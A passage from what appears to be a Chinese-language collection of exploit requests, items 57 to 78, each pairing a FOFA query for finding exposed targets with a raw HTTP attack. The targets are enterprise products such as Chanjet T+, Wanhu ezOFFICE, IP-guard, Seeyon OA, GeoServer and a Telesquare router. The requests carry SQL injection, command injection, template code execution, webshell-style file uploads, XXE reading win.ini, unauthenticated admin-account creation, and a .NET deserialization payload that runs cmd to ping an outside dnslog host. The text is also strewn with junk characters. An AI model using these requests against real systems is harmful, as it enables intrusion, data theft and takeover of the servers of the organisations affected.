User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
) U2 e+ L0 S: N: q' l6 e/ w+ \Content-Type: application/json
S- w3 L# Y" W- ^5 ~4 c$ C; _9 E$ r$ Z5 b. _
{2 d: G8 |, I! v; M& J \' O
"storeID":{
" Y3 T" x T7 D) c+ y) a4 p "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
+ r/ U% c0 d! B+ R "MethodName":"Start",/ C9 I& z+ s2 S' ?& @
"ObjectInstance":{4 Q& k6 D. Y0 k( b1 j2 J y
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",4 J) g5 }* v+ c) O. d+ o8 a
"StartInfo": {
4 `$ x6 |2 E% C% T "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",: K, l" t- w1 m- s
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw", u& y4 _1 ^ K3 N0 O7 y1 ~
}
; r3 i6 _' a6 `! Y% Y! f }
9 K$ e5 I, E+ S6 W" W- | }
; r* C; [, w- P1 m}2 o( o4 _8 Q) ?6 k# Q; Q G e
y9 W& S5 t5 W' u4 m3 {: B6 a1 ?- p$ s9 z
57. 畅捷通T+ keyEdit.aspx SQL注入
7 K' f, `: a0 E! D8 p$ r& R6 L4 LFOFA:app="畅捷通-TPlus"
3 J& j/ F+ V7 A; lGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1( W+ F% Q% e4 O. Q
Host: host
3 ~4 E v+ S& T4 o3 w% J' dUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
( z1 ^; }) f: p* i w/ V! jAccept-Charset: utf-8
' c- s" v6 z. K' \Accept-Encoding: gzip, deflate
4 d% @0 ~2 u4 @ o4 LConnection: close
6 P, b/ c. f$ y, k8 d- V
( z! w- C" F. D |' T, z; u- }9 y
: Y3 X2 X* {9 Y& k# Y58. 畅捷通T+ KeyInfoList.aspx sql注入
/ I E5 \6 a+ V! q. G8 lFOFA:app="畅捷通-TPlus") q+ a7 u% A' Y' `; N# V6 _
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.12 `/ d, |$ p8 t2 [- N( P- r
Host: your-ip7 R$ Z1 |0 X. l3 S' o, J9 }+ Y1 q
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
' h/ f* Y( d5 H( @7 I, c3 ]6 KAccept-Charset: utf-88 p: F; w' U" Q6 i \3 s' n
Accept-Encoding: gzip, deflate7 _4 E% `2 M8 d2 d! L
Connection: close! L# C/ s; _. d$ v+ y) R, \8 ^; u
: E* h0 d0 n+ r' Q' q
2 @* U% |/ }, Q59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
2 _% F# \! n5 U2 `+ @( NFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
" z2 q, w C8 o8 f: E: gPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1$ m, {+ B% M: P( t0 Q. _& W$ [
Host: 192.168.86.128:90904 J* i- Q1 b( a; |. b, B
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36' R9 }/ T8 \/ s. \) L8 U) j
Connection: close) z5 U) Q b- v
Content-Length: 1669
h, M& \- J K1 k( @Accept: */*
% g& P/ f$ a F/ i D; T5 Z$ F tAccept-Language: en4 T& f" E8 } ?# b4 _. l
Content-Type: application/x-www-form-urlencoded
( \. ^2 ~+ G! X1 m) i5 nAccept-Encoding: gzip/ D% d! v) y/ R8 M0 n) y
5 w) T" ^5 H6 C8 q( V( a
PAYLOAD
n" V/ p# T ]3 G8 A/ ?- M3 M! f5 b4 G( e
1 x" p1 C1 N: E7 Y$ W, ~1 [
60. 百卓Smart管理平台 importexport.php SQL注入
2 }& [ t. u5 n9 P) j: YFOFA:title="Smart管理平台"
2 G; W7 h4 ^! c" k$ S+ E/ {) {GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
+ P: F0 `: D9 |/ H& H; e, q4 SHost:
$ `( u/ l) u& U' K& {& j: KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. W3 _% F$ l$ _; a( I8 V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. c* V U* A& l/ JAccept-Encoding: gzip, deflate" t& e: _& b8 p Q" \
Accept-Language: zh-CN,zh;q=0.9
' O$ g8 B0 l, J7 rConnection: close
8 d9 V8 S3 O; T) E: x8 j
( d: Q" g$ N Z
5 h! {6 v6 W5 U; F61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
M+ T) A3 w. _% d! Z# ~ \FOFA: title="欢迎使用浙大恩特客户资源管理系统"
. ?: S0 u) o7 N! `7 g: qPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1) G! h' y, k& B% p q
Host: x.x.x.x; a! N7 f: `1 ~, e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 X# ~* Z. R' T* }$ G, xConnection: close0 I! Y3 l4 v( E! ]! I! V
Content-Length: 27# n6 g/ [& |* t: ?( e* D3 Q
Accept: */*
% Y! x/ f: n$ P/ m7 L' {' P9 O4 HAccept-Encoding: gzip, deflate; R0 ^; ^* h3 h
Accept-Language: en- j- ~ r1 n+ [: p4 h, B7 M* T9 i+ b
Content-Type: application/x-www-form-urlencoded1 ?+ }4 }/ c/ [9 z+ l: J
* N/ ^7 f# c% v: v
8uxssX66eqrqtKObcVa0kid98xa
% X1 I. S4 Z1 \- h8 u
% z( P7 U ] J; H& x( `% _, a
2 p/ O8 ~& o3 n( L6 f62. IP-guard WebServer 远程命令执行# a% L2 G L4 D/ m- ?
FOFA:"IP-guard" && icon_hash="2030860561"
# t( L. `9 _0 [3 Q* q( oGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.12 f7 z1 n/ d* @$ G
Host: x.x.x.x& v B9 D0 l: E m+ k8 a
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36/ G: r$ a [' z+ V# w. H
Connection: close2 k) l0 y5 k8 i8 J* q
Accept: */*6 E* `; l0 `5 M$ L
Accept-Language: en
" S* T: v ~2 ?6 BAccept-Encoding: gzip8 ^. B: }" o g7 K1 u
' I8 R/ v# i# h! F5 I
9 c% k6 O6 r; M4 ?4 H8 X
访问
5 e( y) \4 ?; X* S/ K, H* G
# I# N3 N% I/ H+ SGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
" S' M O/ @4 rHost: x.x.x.x' s/ h' V3 Y0 V2 j
3 E% N' G+ t1 e$ j% D* X
' F0 I8 a% \8 m7 X8 _8 R63. IP-guard WebServer任意文件读取
" t5 J# U8 D, W, L" UIP-guard < 4.82.0609.0% j7 S+ n6 j5 x. ~
FOFA:icon_hash="2030860561"
& B7 d. q. ^* c+ ^# r( L' DPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
# Z8 r- S! E" THost: your-ip1 h$ f% F7 m4 k$ _* {6 w' u) I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
4 z7 v5 R8 |/ @1 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- H* r* F2 g% [* R) R5 H f! L0 g
Accept-Encoding: gzip, deflate
/ K( I/ o7 Q! \# I% z1 q& WAccept-Language: zh-CN,zh;q=0.9
0 b* {0 W& W% \Connection: close9 u: a5 T! L0 _0 @ @" Q; _
Content-Type: application/x-www-form-urlencoded
- W' G- W( R. L3 G
1 Z, u- ^' o# r3 Mpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
$ @4 Z2 d1 K* d4 S |# K
# ]' a# M* C# J. d C8 M1 J, O5 u64. 捷诚管理信息系统CWSFinanceCommon SQL注入6 O5 ?& F0 v$ x/ ?6 I' E% P
FOFA:body="/Scripts/EnjoyMsg.js"
+ `( L; ^& f: `POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
( Q$ x' ]) C0 E# n' cHost: 192.168.86.128:9001) R0 k/ X6 P h) }. Z6 X4 m
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
$ N/ D0 h1 W' u. C3 ~. P. hConnection: close- n8 O$ y3 l# k7 y" P ~
Content-Length: 369
& [0 i' @* z, F R1 `Accept: */*) @: ^7 I) J9 j6 k3 H7 C! B
Accept-Language: en
. ~! a0 F- n( h# |" tContent-Type: text/xml; charset=utf-8; q ~; s6 C) k' u+ J
Accept-Encoding: gzip
- D8 A" a& N% w- z5 F; _7 m
+ e8 O8 l: S a x4 u& ?" v<?xml version="1.0" encoding="utf-8"?>
2 W; J/ ~6 D' b. h0 X+ q<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
: B- E5 h" t3 U6 `! m4 A<soap:Body>
' t9 _- o2 P1 t+ |& I+ N <GetOSpById xmlns="http://tempuri.org/">& C6 p: @+ t. J% N+ c) U* r
<sId>1';waitfor delay '0:0:5'--+</sId>% t2 E+ J, C/ e! v1 |. Z+ g P
</GetOSpById>
, k) n* m5 S$ f3 n9 s. N </soap:Body>
: s; S. k& f2 G$ i+ ~! R</soap:Envelope>
% _. C, }# G- G6 x2 e! p+ K3 A( P& F( [+ m5 T3 Z
1 K- S# |" ^$ e) l65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
" b$ u3 R, Y# g! k2 ?! s7 A& [$ JFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
/ m' L! g) `% k3 V响应200即成功创建账号test123456/123456) b' r- \& u$ u0 n/ ], E! M7 [8 f
POST /SystemMng.ashx HTTP/1.1
% @2 K# q2 V2 L: F" N4 I1 XHost:4 Z) L# j: a5 l* j
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)& R& d0 y9 O# M6 c3 d4 S
Accept-Encoding: gzip, deflate/ C$ [6 ]2 d- o: f
Accept: */*( d4 t t& @2 N$ i1 I) f/ N
Connection: close- x" I; I' R0 Y/ q
Accept-Language: en
; K) c+ z/ j: v$ e! YContent-Length: 174
6 j) v8 y+ C& q/ d
2 ~: V5 J, e. E, ~- Y9 ooperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
4 b, H8 f7 W7 d) f7 \1 r H$ f: X& E
* Q6 Z, T3 ]& S# L, Y5 r9 k66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
4 F. W! X5 O9 U! U- \- R' O4 pFOFA:app="万户ezOFFICE协同管理平台" c, |% R. r' X3 z
7 _& B* b) j; P3 l- sGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
( d: a3 }* ^+ ]0 \; N. n; n' v+ RHost: x.x.x.x
$ e# s: B' Y% NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
# j( |* Z( e; n0 Q# _: pConnection: close: X9 u, @' c4 w1 ?5 E1 m
Accept: */*
! _0 o7 C" G ^Accept-Language: en
+ a# |2 V: k( u0 aAccept-Encoding: gzip2 Q* l! f" x9 ^5 ~5 i |8 Y
" {7 ]' r" S& R+ h, w2 D+ V
7 J* U# ]& N" q第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
% ?+ E2 X8 e2 w
" H* g9 V% |! D: I67. 万户ezOFFICE wpsservlet任意文件上传+ Q0 }. {/ I* V* G- j, p0 P& h
FOFA:app="万户网络-ezOFFICE"
5 s9 @9 y4 G2 b& \newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
! }1 V' }' r& k. _& |POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1$ D5 i4 w! @: P5 H4 J8 Y
Host: x.x.x.x
' }: m" H4 F1 O6 f) h- FUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
/ T2 O( r, X( w5 T6 YContent-Length: 173- J# j/ u `) H; h: p: ~3 a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8# r% }( W/ ?7 d+ v d
Accept-Encoding: gzip, deflate7 l% O" t+ R1 r# V) }7 I
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
4 P, E2 r$ q0 x- i, h8 {9 ~- hConnection: close! M/ `8 j) g& z U- k" l) ?
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
" M" J& ^7 [& B7 P2 ?( Q* ODNT: 1) |% c h# Z% _* k4 z
Upgrade-Insecure-Requests: 1* u0 A4 K' T8 w' v0 l4 B* H( e
8 S& h/ J. \+ D( J5 k# t+ j/ R/ |3 k
--ufuadpxathqvxfqnuyuqaozvseiueerp
4 L, w1 ?5 v% \. AContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
5 }+ G$ d- k! t6 K/ g8 {1 z- H' ?% s+ X& z- b8 _
<% out.print("sasdfghjkj");%>4 `+ N0 b) R- M0 i% ~
--ufuadpxathqvxfqnuyuqaozvseiueerp--( e- n S1 ^' m
! K, E _5 x0 s$ Q4 B1 s. ^9 [" z
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
# t* B4 i/ q) Z# }1 h: L- e$ C5 f6 {
68. 万户ezOFFICE wf_printnum.jsp SQL注入8 X- a, a$ Q. l# j$ d
FOFA:app="万户ezOFFICE协同管理平台"0 I4 N, u+ C5 Z2 c
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
9 ?! G) V Q/ P; L }7 K2 GHost: {{host}}
* \: `/ g$ W ^+ |* o5 @6 B4 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36# ?! p! [2 [$ \# {9 a
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8; L! w: X6 T, Y# w6 m
Accept-Encoding: gzip, deflate
" F x! }2 Y6 ]( n, |) ~Accept-Language: zh-CN,zh;q=0.9* [( h) |0 V3 `2 v3 `( v
Connection: close
/ n' ?/ l% n$ F3 J6 v
7 d* P: s+ v( a3 B. t4 M+ A y6 T( {. w" s+ K% F
69. 万户 ezOFFICE contract_gd.jsp SQL注入! a" E0 Y. v. Q# W' @; I* a6 f
FOFA:app="万户ezOFFICE协同管理平台"5 Z" r5 E2 y+ Y6 c
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
( W: _4 {$ [$ q5 h' k! IHost: your-ip
6 Y9 G% f i# |2 \User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.366 ~- Y, O0 o# A8 f5 j; }
Accept-Encoding: gzip, deflate4 @+ {( v7 l" n5 N) O- Z) L1 D( Z
Accept: */*+ e! L' I/ t, Z; ]# p: Y p
Connection: keep-alive1 J5 u5 ]: u4 n' N4 G* b! h3 Y3 z
5 _6 w: [1 c$ p! b$ p. x
: w9 l* H# J, U4 P X& u/ @70. 万户ezEIP success 命令执行4 r8 x7 B. T2 L- z v! [
FOFA:app="万户网络-ezEIP"
/ O2 i; p V" q% JPOST /member/success.aspx HTTP/1.1" Y* j2 f1 }$ R. l
Host: {{Hostname}}6 d$ H7 O2 g) t, N( S1 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
# W5 b1 ?2 }; _# v+ w8 bSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=' G6 c' a x) M
Content-Type: application/x-www-form-urlencoded- a4 m( R0 R. K
TYPE: C
* t. O7 g% g* v. E) Y1 T! K0 ~& t! bContent-Length: 16702
! N- G( Y' P- I0 y: ~3 N. G& H
( i; E3 L9 C$ f( D0 v__VIEWSTATE=PAYLOAD
2 B+ T% O) v' D2 p! u9 P
$ e# O& d$ t0 e% W6 W7 \1 ]& D: Y( _, J; Y8 y
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入% A0 v1 z% ]) s3 x
FOFA:body="PM2项目管理系统BS版增强工具.zip"2 D @& \7 a% ^* z+ T
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
" R' L/ W3 i# r! qHost: x.x.x.xx.x.x.x+ a! f* z D( ^3 F. F5 o9 E
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.364 ~% u" |$ R2 O" E1 O
Connection: close( n# k: U' A) }' P7 Z5 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 A2 X4 H5 e7 f3 c l
Accept-Encoding: gzip, deflate' G0 |4 H. p+ Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' {2 f( Z. R, Q& r M; {
Upgrade-Insecure-Requests: 1
/ Q, w) A. s! Q) Z+ r! X$ C6 m# I4 r, e. {! e
5 L- A2 ]5 B# W
72. 致远OA getAjaxDataServlet XXE" o7 ^$ t2 r( h2 `( F
FOFA:app="致远互联-OA"
. z( }# L- Y1 ^% IPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.17 P2 X j" @! l! O1 Y' I4 O
Host: 192.168.40.131:8099
8 q3 m4 c1 d: g: |+ `6 aUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
+ C$ d! }6 |$ L0 E+ `/ mConnection: close
3 S! H1 ?* x; H( o' d9 A$ U' m1 yContent-Length: 583: d. R2 t2 y& [+ F) Z! G* y8 x% p
Content-Type: application/x-www-form-urlencoded
J0 g$ a1 `2 iAccept-Encoding: gzip
( t, O; x2 A. D2 H& v" l5 v
2 d: c% k$ [2 b" ^S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
7 X$ l" m5 F. D* r6 `& ~* F) \; B4 N) c& F
8 n. E6 r4 z+ }3 u0 F
73. GeoServer wms远程代码执行
l: _8 U' L. _8 j8 B% sFOFA:icon_hash=”97540678”$ r# M" H! l5 _# e+ B n, t3 u
POST /geoserver/wms HTTP/1.1
" R+ I" a2 [: t) mHost:
" f& }1 E3 Q. t/ u& W+ C) q H2 ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.363 E8 n2 G8 G! w/ u; y8 b
Content-Length: 1981
, j' _7 v, X* a2 N L- R# {' NAccept-Encoding: gzip, deflate' ^% j) f8 T" d% |
Connection: close
* L' ]/ J2 C# K1 `# _Content-Type: application/xml
4 @4 t/ u* ?: kSL-CE-SUID: 3
: D; p! K7 u8 Y$ X
* h- ]8 V; E' h. aPAYLOAD
. W) m4 W G) I
0 F% D- a A& h
/ s2 j/ [/ m' N0 l: N74. 致远M3-server 6_1sp1 反序列化RCE; T: e& p7 j' d8 B+ Y) E' |
FOFA:title="M3-Server"
2 D- W& V0 [$ k- R) h/ R5 jPAYLOAD
# \5 c2 H+ v7 n. H6 Y& j* Y* p- O
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
/ v+ N. K$ B* ZFOFA:app="TELESQUARE-TLR-2005KSH"
1 z' X4 T* n: N3 IGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1' o4 r2 @% S) e0 W3 f! r% K
Host: x.x.x.x8 X7 Q) r c% T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 I. R! {% Z3 N4 pConnection: close1 c& `) }) u8 |3 l5 k% Y
Accept: */*) x: X- u' {1 o# X9 j: F
Accept-Language: en
+ U1 F+ W, i/ Q% o& FAccept-Encoding: gzip
2 r7 H5 K' B# X1 U5 M
1 N+ W p8 f( ^; g- F7 Q; d7 ], n
GET /cgi-bin/test28256.txt HTTP/1.1" `3 V( {+ W. k6 S
Host: x.x.x.x# A& X2 G m/ X$ c3 T) v5 i' U
1 Z7 Q4 S5 K# H4 I6 I7 ~% Z& c8 D3 A" \
76. 新开普掌上校园服务管理平台service.action远程命令执行
# A% @* q d8 vFOFA:title="掌上校园服务管理平台"
' j1 X0 Q5 a1 H1 ePOST /service_transport/service.action HTTP/1.11 x( }/ w, |6 e! ?# W
Host: x.x.x.x0 }3 F7 K5 D. j9 E% i# Z; c) j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
+ b; `- l) Y6 n7 n' Z3 G3 jConnection: close
0 a! c( @1 L( M. [" w9 GContent-Length: 211
e' a: H0 E1 r I/ B/ Y* Q vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& `' ]7 E. j2 u9 F1 `& XAccept-Encoding: gzip, deflate
7 n( D a/ R- Y0 F* y: pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 Z0 b0 M' y+ @8 u6 p6 M1 CCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A48 g1 c5 x$ o6 ^6 c% {: ^ Z8 S2 l
Upgrade-Insecure-Requests: 1
h2 j! V& W# w3 `, f3 C$ Q
& y* F4 ?! j2 R0 o% N. D+ q{+ W( }0 w* D" H# ~" O
"command": "GetFZinfo",
# @ _6 m8 J$ `! V1 k+ Q "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
K& Q5 \3 O% J, Y ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
9 |8 u& q8 i+ E' T0 m2 g}
- d5 k/ N' G- ?( Y$ E6 T5 z J8 L) P7 ~" h( ~
( y0 ~) |( N' A e. {0 d
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
/ |. E7 @4 r' R. U2 sHost: x.x.x.x6 K0 t C- x( l4 D9 H
8 ]8 l6 Y; T6 b8 G, m9 V; E, }1 x$ t4 @! W- D# E
" D) p1 ]& [, e" V& {5 ]7 N8 R. T
77. F22服装管理软件系统UploadHandler.ashx任意文件上传" N7 W/ ? x: C+ c3 p X; @7 K
FOFA:body="F22WEB登陆" S( B& U% K# b% W D
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.15 c; X9 _ t; A
Host: x.x.x.x: N# m: W) D+ g: D- n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
8 P$ G$ f: y+ k5 AConnection: close
/ ?& W9 Z6 b! l$ p/ {$ {Content-Length: 433' R+ x7 \7 w: Y6 _# P2 Q
Accept: */*; q0 s/ h( J$ W& l0 J! b5 F
Accept-Encoding: gzip, deflate
" w6 N: t8 P# ]Accept-Language: zh-CN,zh;q=0.91 T) ^. ]/ U4 o/ J5 n
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix& v4 S( z* U4 ~3 U3 t, _( y
. I! S1 q. D: P0 ?
------------398jnjVTTlDVXHlE7yYnfwBoix3 @( I8 y, T6 E/ n" E$ I3 H% t2 L2 m" Y
Content-Disposition: form-data; name="folder"
: ^; A7 S B/ \8 `+ E( n+ l z
. Z8 K: S7 P2 F) c+ u" {2 E/upload/udplog
8 U, ^) |8 l$ Z. y& P* t. b# C------------398jnjVTTlDVXHlE7yYnfwBoix
/ p+ F0 S$ O. e0 {( N. V1 dContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
5 Y; S, c b" N8 d8 o. b$ J0 AContent-Type: application/octet-stream# P: [6 @6 Y6 |6 l: ^
% E. E$ O( ?+ a1 \hello1234567
; E( H/ s0 p% ]6 H# e------------398jnjVTTlDVXHlE7yYnfwBoix
3 F( X% ]1 \" M4 `1 k X' D/ pContent-Disposition: form-data; name="Upload"
. v( }: a) g; Z. U& F4 c
7 j; L" H1 J5 j& TSubmit Query) q" P; {1 j% S# B) F
------------398jnjVTTlDVXHlE7yYnfwBoix--
! q( c) q9 R' A7 R0 N4 K' ^+ G" [8 X' w
/ X1 D1 [! u: |' Y- D. w' y# `78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传6 H7 I# H9 J8 {8 W0 G
FOFA:icon_hash="2001627082"& u' Z! ~4 k3 t3 Z. o1 v6 O
POST /Platform/System/FileUpload.ashx HTTP/1.1 C" F/ `% n) J5 |5 l; T3 k
Host: x.x.x.x& Z5 y i/ w+ J" P$ X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& Y- Y( l; C1 I y7 o- xConnection: close8 U; Y: E1 N6 x7 A3 K
Content-Length: 336
+ E6 n" B8 H. z+ j: g/ h' p8 \4 U" [% R9 ^Accept-Encoding: gzip
1 W7 y; E6 q. a, m; E: ~Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
; u# s u1 S+ g
4 `2 x% N9 g# g0 R8 H$ g------YsOxWxSvj1KyZow1PTsh98fdu6l
' x7 p. t* l& |/ J. BContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"- j" l! @9 C$ K. U
Content-Type: image/png* [5 u% F7 O V6 c4 k5 q
6 `4 j/ F2 x5 P" C/ [' ], ^
YsOxWxSvj1KyZow1PTsh98fdu6l6 j( _/ Y) V! O2 y8 v/ `: m( u8 `
------YsOxWxSvj1KyZow1PTsh98fdu6l
4 p6 o% f0 |6 y2 [7 M& j! z7 P. l) rContent-Disposition: form-data; name="target"
; g4 Q$ _+ v; W; W- H3 Y1 ?! l. A
1 f- _; D6 r% }2 y% n/Applications/SkillDevelopAndEHS/
0 `: b3 g, {& q; O! a------YsOxWxSvj1KyZow1PTsh98fdu6l--& q5 F( W6 v* y" L+ }1 f" z3 l
# P' M. j: \0 ^' x
0 x, u+ l0 x- k! f/ S
